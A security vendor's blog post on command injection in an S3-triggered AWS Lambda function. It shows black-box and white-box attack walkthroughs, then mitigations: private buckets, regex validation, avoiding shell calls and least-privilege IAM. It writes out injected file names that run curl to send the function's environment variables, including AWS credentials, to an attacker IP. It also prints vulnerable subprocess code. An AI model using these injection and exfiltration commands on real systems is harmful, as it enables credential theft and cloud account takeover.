Vulnerable AWS Lambda Function – Initial Access in Cloud Attacks

Published 06/10/2022

This blog was originally published by Sysdig here.

Written by Stefano Chierici, Sysdig.



Our security research team explains a real attack scenario, from both the black box and white box perspectives, showing how a vulnerable AWS Lambda function could be used by attackers as initial access into your cloud environment. Finally, we show the best practices to mitigate this attack vector.

Serverless is becoming mainstream in business applications to achieve scalability, performance, and cost efficiency without managing the underlying infrastructure. These workloads are able to scale to thousands of concurrent requests per second. One of the most used Serverless functions in cloud environments is the AWS Lambda function.

Security is an essential element of bringing an application to production. An error in the code or a lack of user input validation may cause the function to be compromised and could give attackers access to your cloud account.

About AWS Lambda function

AWS Lambda is an event-driven, serverless compute service which permits the execution of code written in different programming languages and automates actions inside a cloud environment.

One of the main benefits of this approach is that Lambda runs our code in a highly available compute infrastructure directly managed by AWS. The cloud provider takes care of all the administrative activities related to the infrastructure underneath, including server and operating system maintenance, automatic scaling, patching, and logging.

Users only need to provide their code, and the function is ready to go.

Security, a shared pain



From a security perspective, because Lambda is managed by the cloud provider but still configurable by the user, the security concerns and risks are shared between the two parties.

Since the user doesn’t have control over the infrastructure behind a specific Lambda function, the security risks on the infrastructure underneath are managed directly by the cloud provider.

Using AWS IAM, the user can restrict the access and the permitted actions of the Lambda function and its components. Misconfigured permissions on IAM roles or on objects used by the Lambda function might cause serious damage, letting attackers into the cloud environment. Even more importantly, the code implemented in the Lambda function is under user control and, as we will see in the next sections, if there are security holes in the code, the function might be used to access the cloud account and move laterally.

Attack Scenarios

We are going through two attack scenarios using two different testing approaches: black box and white box testing, which are two of the main testing approaches used in penetration testing to assess the security posture of a specific infrastructure, application, or function.

Looking at the Lambda function from a different perspective would help to create a better overall picture of the security posture of our function, and help us better understand the possible attacks and the related risks.

Black box vs white box

In Black box testing, whoever is attacking the environment doesn’t have any information about the environment itself and the internal workings of the software system. In this approach, the attacker needs to make assumptions about what might be behind the logic of a specific feature and keep testing those assumptions to find a way in. For our scenario, the attacker doesn't have any access to the cloud environment and doesn’t have any internal information about the cloud environment or the functions and roles available in the account.

In White box testing, the attacker already has internal information which can be used during the attack to achieve their goals. In this case, the attacker has all the information needed to find the possible vulnerabilities and security issues.

For this reason, white box testing is considered the most exhaustive way of testing. In our scenario, the attacker has read-only initial access in the cloud environment and this information can be used by the attacker to assess what is already deployed and better target the attack.

#1 Black Box Scenario



In this attack scenario the attacker found a misconfigured S3 bucket open to the public where there are different files owned by the company.

The attacker is able to upload files into the bucket and check each file's configuration once uploaded. A Lambda function is being used to calculate the tags for each uploaded file, although the attacker doesn’t know anything about the code implemented in the Lambda function.



We use the AWS CLI to list all the objects inside the bucket prod-file-bucket-eu.

aws s3 ls prod-file-bucket-eu





One thing we can do with the uploaded files is check their tags for useful information. Using get-object-tagging, we can see the following tags assigned to the file.

aws s3api get-object-tagging --bucket prod-file-bucket-eu --key config161.zip

Those tags are surely custom and added dynamically when a file is uploaded into the bucket. Presumably, there is a sort of function which adds those tags related to the file size and path.

Using curl or awscli, we can try to upload a zip file and see if the tags will be automatically added to our file.

aws s3 cp config.zip s3://prod-file-bucket-eu/

    curl -X PUT -T config.zip \
      -H "Host: prod-file-bucket-eu.s3.amazonaws.com" \
      -H "Date: Thu, 02 Dec 2021 15:47:04 +0100" \
      -H "Content-Type: ${contentType}" \
      http://prod-file-bucket-eu.s3.amazonaws.com/config.zip

Once the file is uploaded, we can check the file tag and see that the tag has been added automatically.

aws s3api get-object-tagging --bucket prod-file-bucket-eu --key config161.zip

We can be pretty confident there is an AWS Lambda function behind those values. The function appears to be triggered when a new object is created into the bucket. The two tags, Path and Size, seem to be calculated dynamically for each file, perhaps executing OS commands to retrieve information.

We can assume the file name is used to look for the file inside the OS and also to calculate the file size. In other words, the file name might be a user input which is used in the OS command to retrieve the information to put in the tags. Missing user input validation might allow an attacker to submit unwanted input or execute arbitrary commands on the machine.
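For context, S3 hands the object key to the function inside the event notification. The following is a minimal sketch of how a handler typically reads it, assuming the standard S3 event shape. The helper name `object_keys_from_event` is hypothetical, and this is not the code of the function under attack.

```python
import urllib.parse


def object_keys_from_event(event: dict) -> list[tuple[str, str]]:
    """Return (bucket, key) pairs found in an S3 event notification."""
    pairs = []
    for record in event.get("Records", []):
        bucket = record["s3"]["bucket"]["name"]
        # S3 URL-encodes the key in the notification; spaces arrive as "+".
        key = urllib.parse.unquote_plus(record["s3"]["object"]["key"])
        pairs.append((bucket, key))
    return pairs


def lambda_handler(event, context):
    # Hypothetical handler: every key returned here was chosen by the uploader,
    # so it has to be treated as untrusted input.
    return object_keys_from_event(event)
```

Whoever can write to the bucket controls the decoded key completely, including spaces, quotes, and semicolons.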

In this case, we can try to inject other commands into the file name to achieve remote code execution. Concatenating commands, using a semicolon, is a common way to append arbitrary commands into the user input so that the code would execute them if the user input isn’t well sanitized.



Let’s try to append a curl command that opens a connection to an EC2 instance controlled by us and sends the test message “testRCECurl” using the POST method.

aws s3 cp config.zip 's3://prod-file-bucket-eu/screen;curl -X POST -d "testRCECurl" 3.80.92.111:443;'

From the screen below, we can see the command has been correctly executed and we received the connection and the message in the POST.

In this way, we proved the user input isn’t validated at all and we can successfully execute arbitrary commands on the AWS Lambda OS. We can use this security hole to get access directly to the Cloud environment.



One of the ways to extract AWS credentials is via the environment variables. We have already demonstrated that we can receive a connection back on our attacker machine, so we can send the output of env in the POST message to extract information from the environment.

aws s3 cp config.zip 's3://prod-file-bucket-eu/screen;curl -X POST -d "`env`" 3.80.92.111:443;.zip'
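The listener receives the raw output of env as the POST body, one NAME=value pair per line. A minimal sketch of pulling the three credential variables out of such a dump could look like this. The function name is hypothetical, and any sample values used with it are placeholders, not real output.

```python
WANTED = ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")


def extract_aws_credentials(env_dump: str) -> dict[str, str]:
    """Pick the temporary AWS credential variables out of `env` output."""
    creds = {}
    for line in env_dump.splitlines():
        # Split on the first "=" only: session tokens may contain "=" themselves.
        name, sep, value = line.partition("=")
        if sep and name in WANTED:
            creds[name] = value
    return creds
```

The same three variable names are the ones the AWS CLI reads from the environment, which is why exporting them is enough to act as the function's role.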

Using the curl command, we successfully exfiltrate the cloud credentials, which we can use to log into the cloud account. We can now import AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN and, as we can see from the get-caller-identity output, we are able to log in successfully.

aws sts get-caller-identity

    {
        "UserId": "AROA2PVZZYWS7MCERGTMS:corpFuncEasy",
        "Account": "720870426021",
        "Arn": "arn:aws:sts::720870426021:assumed-role/corpFuncEasy/corpFuncEasy"
    }
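The Arn field tells us what kind of identity we are using. As a rough sketch, the hypothetical helper below splits a caller ARN into its parts, assuming the usual `arn:partition:service:region:account:resource` layout. For an assumed role, the resource part carries both the role name and the session name.

```python
def parse_caller_arn(arn: str) -> dict[str, str]:
    """Split a caller ARN into service, account, and identity details."""
    # Layout assumed: arn:partition:service:region:account-id:resource
    parts = arn.split(":", 5)
    if len(parts) != 6 or parts[0] != "arn":
        raise ValueError(f"not an ARN: {arn!r}")
    _, _, service, _, account, resource = parts
    kind, _, rest = resource.partition("/")
    info = {"service": service, "account": account, "kind": kind}
    if kind == "assumed-role":
        # assumed-role/<role name>/<session name>
        role, _, session = rest.partition("/")
        info["role"] = role
        info["session"] = session
    else:
        info["name"] = rest
    return info
```

Applied to the output above, this reports an `assumed-role` identity whose role and session are both `corpFuncEasy`, which is consistent with credentials taken from inside a function running under that role.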

Once in there, the attacker can start the enumeration process to assess the privileges obtained and see if there are paths to further escalate the privileges inside the cloud account.

#2 White Box Scenario

Let’s use the white box approach for the same attack scenario proposed before, where an attacker found a misconfigured S3 bucket. In this case, the attacker has gained access to the cloud environment by stealing credentials via phishing, and the compromised user has read-only access in the account.

Thanks to the read-only access, the attacker can also read the code implemented in the Lambda function and use that information to better target the attack.



Let’s start with checking if the credentials obtained are valid to log into the cloud account.

aws sts get-caller-identity

    {
        "UserId": "AIDA2PVZZYWS3MXZKDH66",
        "Account": "720870426021",
        "Arn": "arn:aws:iam::720870426021:user/operator"
    }



Once logged in, we can start to evaluate the privileges we have attached to our user or group. In this example, we can see the following policy attached.

aws iam list-attached-user-policies --user-name operator

We only have read-only access so we can start gathering information on what is already deployed into the account, focusing in particular on the misconfigured S3 bucket.

Like we have seen in the black box scenario, it is fair to assume that a lambda function is in place for the bucket we found open. Finding additional information regarding the lambda function in place would be helpful to better mount the attack.



Using the command list-functions, we can see the lambda functions available in the account. In this case, we found the corpFuncEasy function with the related information, in particular the role used by the function.

aws lambda list-functions

Using get-function, we can deep dive into the lambda function found before. Here, we can find fundamental information such as the link to download the function code.

aws lambda get-function --function-name corpFuncEasy

    {
        "Configuration": {
            "FunctionName": "corpFuncEasy",
            "FunctionArn": "arn:aws:lambda:us-east-1:720870426021:function:corpFuncEasy",
            ...
        },
        "Code": {
            "RepositoryType": "S3",
            "Location": "https://prod-04-2014-tasks.s3.us-east-1.amazonaws.com/snapshots/720870426021/corpFuncEasy-9c1924b0-501a-..."
        },
        "Tags": {
            "lambda-console:blueprint": "s3-get-object-python"
        }
    }
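When reviewing several functions, it can help to reduce each get-function response to the few fields that matter for the attack. The sketch below is one way to do that from the saved JSON output. The helper name is hypothetical, and it assumes the response carries the usual `Role` and `Runtime` keys under `Configuration`, which are elided in the output above.

```python
import json


def summarize_get_function(raw_json: str) -> dict:
    """Keep only the fields of a get-function response relevant to a review."""
    data = json.loads(raw_json)
    config = data.get("Configuration", {})
    code = data.get("Code", {})
    return {
        "name": config.get("FunctionName"),
        # Execution role: its permissions are what leaked credentials would carry.
        "role": config.get("Role"),
        "runtime": config.get("Runtime"),
        # Pre-signed link from which the deployment package can be downloaded.
        "code_location": code.get("Location"),
        "blueprint": data.get("Tags", {}).get("lambda-console:blueprint"),
    }
```

Missing keys simply come back as `None`, so the helper also works on partial output.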

With knowledge of the code, we can better assess the function and see if the security best practices have been applied.



In this piece of code, we can see that the uploaded file is placed in the /tmp/ folder and the file path is passed directly into the subprocess command and executed. No input validation is applied to sanitize the file name. Now we better understand why the aforementioned attack was successful.

Using the file name “screen.zip;curl -X POST -d "testRCECurl" 3.80.92.111:443” as done before the subprocess command would be:

“stat -c %s screen.zip;curl -X POST -d "testRCECurl" 3.80.92.111:443”

As we can see, using the semicolon character, we can append other commands to be executed right after the stat command. As we mentioned before, the curl command is executed and the string has been sent to the attacking system on port 443.
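To make the effect of the semicolon concrete without running anything, the sketch below builds the same kind of command string and tokenizes it with Python's shlex module in a shell-like mode (Python 3.8 or later). Both helper names are hypothetical, and shlex only approximates what a real shell does.

```python
import shlex


def build_stat_command(file_download_path: str) -> str:
    # Same string concatenation as in the function under review.
    return "stat -c %s " + file_download_path


def split_shell_commands(command_line: str) -> list[list[str]]:
    """Tokenize a command line and split it at each ';' separator."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token == ";":
            # A ';' ends the current command; the next token starts a new one.
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


name = 'screen.zip;curl -X POST -d "testRCECurl" 3.80.92.111:443'
for argv in split_shell_commands(build_stat_command(name)):
    print(argv)
```

The loop prints two separate argument lists, one starting with stat and one starting with curl: a single file name has turned into two commands.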

Mitigation

We have seen the attack scenario from the black box and white box perspectives, but what can we do to mitigate this scenario? In the proposed scenario, we covered different AWS components, like S3 buckets and AWS lambda, in which some security aspects have been neglected.

In order to successfully mitigate this scenario, we can act on different levels and different features. In particular, we could:



- Disable the public access for the S3 bucket, so that it will be accessible just from inside and to the users who are authenticated into the cloud account.

- Check the code used inside the lambda function, to be sure there aren’t any security bugs inside it and all the user inputs are correctly sanitized following the security guidelines for writing code securely.

- Apply the least privileges concept in all the AWS IAM Roles applied to cloud features to avoid unwanted actions or possible privilege escalation paths inside the account.

Let’s have a look at all the points mentioned above in detail on how we can enforce those mitigations.

Disable the public access for the S3 bucket

An S3 bucket is one of the key components in AWS used as storage. S3 buckets are often used by attackers who want to break into cloud accounts.

It’s critical to keep S3 buckets as secure as possible, applying all the security settings available and avoiding unwanted access to our data or files.

For this specific scenario, the bucket was publicly open and any unauthorized user was able to read and write objects in the bucket. To avoid this behavior, we need to make sure that the bucket is private by applying the following security settings to restrict access.

In addition, by using ACLs and bucket policies, it’s possible to define the permitted actions on the bucket and on the objects inside it, and block everything else.

    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "PublicReadGetObject",
                "Effect": "Allow",
                "Principal": "*",
                "Action": [
                    "s3:GetObject",
                    "s3:PutObject"
                ],
                "Resource": "arn:aws:s3:::s3bucket********/www/html/word/*"
            },
            {
                "Sid": "PublicReadListObject",
                "Effect": "Allow",
                "Principal": "*",
                "Action": "s3:List*",
                "Resource": "arn:aws:s3:::s3bucket********/*"
            }
        ]
    }
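Both statements in the policy above use a wildcard principal, so anyone can perform the listed actions on the matching resources. As a rough aid when reviewing policies, the sketch below flags Allow statements whose principal is a wildcard. The function names are hypothetical, and the check is deliberately simplified: it ignores Condition blocks and is not a substitute for AWS's own policy evaluation.

```python
def _is_wildcard(principal) -> bool:
    """True if a Principal value grants access to everyone."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any(_is_wildcard(value) for value in principal.values())
    if isinstance(principal, list):
        return "*" in principal
    return False


def public_statements(policy: dict) -> list[str]:
    """Return the Sid of every Allow statement open to any principal."""
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):
        # A policy may hold a single statement object instead of a list.
        statements = [statements]
    return [
        stmt.get("Sid", "<no Sid>")
        for stmt in statements
        if stmt.get("Effect") == "Allow" and _is_wildcard(stmt.get("Principal"))
    ]
```

Run against the policy shown above, it reports both `PublicReadGetObject` and `PublicReadListObject`.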

Check the code used inside the lambda function

As any other web application, making sure the code is implemented following the security best practice is fundamental to avoid security issues. The code in the Lambda function isn’t an exception and we need to be sure the code is secure and bulletproof.

In this case, the vulnerable piece of code shown before, which an attacker could use to attack the function, is the following:

    file_count_KB = subprocess.check_output(
        "stat -c %s " + file_download_path,
        shell=True,
        stderr=subprocess.STDOUT
    ).decode().rstrip()

The variable file_download_path contains the full file path including the file name. The path is concatenated directly into the command line to execute the command. However, the file name is decided and controlled by the user, so for this reason, we need to apply the proper user input validation and sanitisation based on the chars allowed before appending the path into a command.

To apply the right and effective validation, we need a clear idea of which chars are allowed in our string, and we need to apply the best practices on input validation.

Using regex, it’s possible to allow just the chars that we want inside our file path and block the execution in case an attacker tries to submit bad chars. Below is an example of a regex that validates a Linux file path.

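    import re
    import subprocess

    # Allow "/" or an absolute path made only of letters, digits, "_" and "-".
    # The class has no "."; extend it if file extensions must be accepted.
    pattern = r"^/$|^(/[a-zA-Z_0-9-]+)+$"

    # fullmatch requires the whole path to match, including any trailing newline.
    if re.fullmatch(pattern, file_download_path):
        file_count_KB = subprocess.check_output(
            "stat -c %s " + file_download_path,
            shell=True,
            stderr=subprocess.STDOUT
        ).decode().rstrip()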

It is worth mentioning that the regex is specific to the field or input we want to validate. OWASP provides great best practices you can follow when you need to handle user input of any kind.
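Validation can also be combined with removing the shell from the picture altogether. The following is a minimal sketch of that idea, not the function's actual fix: it assumes uploaded names only need letters, digits, "_", "-" and ".", and both helper names are hypothetical. The size is read with os.stat, so the file name never reaches a command line.

```python
import os
import re

# Assumption: one or more dot-separated parts made of letters, digits, "_", "-".
# This rejects empty names, ".", "..", spaces, quotes, and shell metacharacters.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)*")


def safe_download_path(key: str, base_dir: str = "/tmp") -> str:
    """Map an S3 object key to a local path, or raise if the name is unsafe."""
    name = key.rsplit("/", 1)[-1]  # drop any key prefix such as "uploads/"
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected object key: {key!r}")
    return os.path.join(base_dir, name)


def file_size_bytes(path: str) -> int:
    # os.stat is a direct system call: no shell parses the path.
    return os.stat(path).st_size
```

With this approach, a key such as `screen;curl ...` is rejected before any file is written, and even an unexpected name could not be interpreted as a command because no shell is involved.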

Apply the least privileges concept in AWS IAM Roles

AWS Identity and Access Management (IAM) enables you to manage access to AWS services and resources securely. As we said in the first section, the user is in charge of managing the Identity and Access management layer and uses permissions to allow and deny their access to AWS resources.

Due to the fine granularity of permissions available in cloud environments, applying the least privilege concept is recommended: give a user exactly what it needs to perform its actions. A misconfigured privilege could allow an attacker to escalate privileges inside the environment.

In the black box scenario, the attacker is able to log into the account with the AWS Role associated with the lambda function.

Potentially, the attacker might be able to proceed with the attack and escalate privileges inside the AWS account through possible privilege misconfigurations. By applying just the strictly needed privileges to the role assigned to the Lambda function, we can minimize the possible escalation paths and make sure an attacker isn’t able to compromise the entire cloud environment.
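As an illustration of what "strictly needed" could mean here, the sketch below generates a policy document for the function's role. It rests on an assumption about the function: that it only has to read uploaded objects and write their tags in one bucket. The helper name and the Sid are hypothetical, and a real role would usually also need permissions to write its logs.

```python
import json


def tagging_function_policy(bucket: str) -> dict:
    """Build a policy limited to reading and tagging objects in one bucket."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "ReadAndTagUploadedObjects",
                "Effect": "Allow",
                # Only the two object-level actions assumed to be required.
                "Action": ["s3:GetObject", "s3:PutObjectTagging"],
                # Objects in this bucket only, not every bucket in the account.
                "Resource": f"arn:aws:s3:::{bucket}/*",
            }
        ],
    }


print(json.dumps(tagging_function_policy("prod-file-bucket-eu"), indent=2))
```

Credentials stolen from a function with a role like this would still work, but they would be limited to those two actions on that bucket.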

Of course, it’s not that easy to have a clear picture of which policies and roles are attached to each group, user, or resource. Security tools that continuously monitor for anomalous activity in the cloud can generate security events for us. In the case of AWS, with the right tools, we can gather events from CloudTrail, among other sources, and easily assess and strengthen our cloud security.

Conclusion

AWS Lambda functions offer great benefits in terms of scalability and performance. However, if the all-around security isn’t managed in the best way possible, those serverless functions might be misused by attackers as a way into your AWS account.

Applying the proper input validation in the Lambda code and the security best practices in the function triggers is fundamental to avoid malicious activities by attackers. As often happens in cloud environments, making sure to apply the least privileges concept in IAM permissions would prevent possible privilege escalation inside the environment.
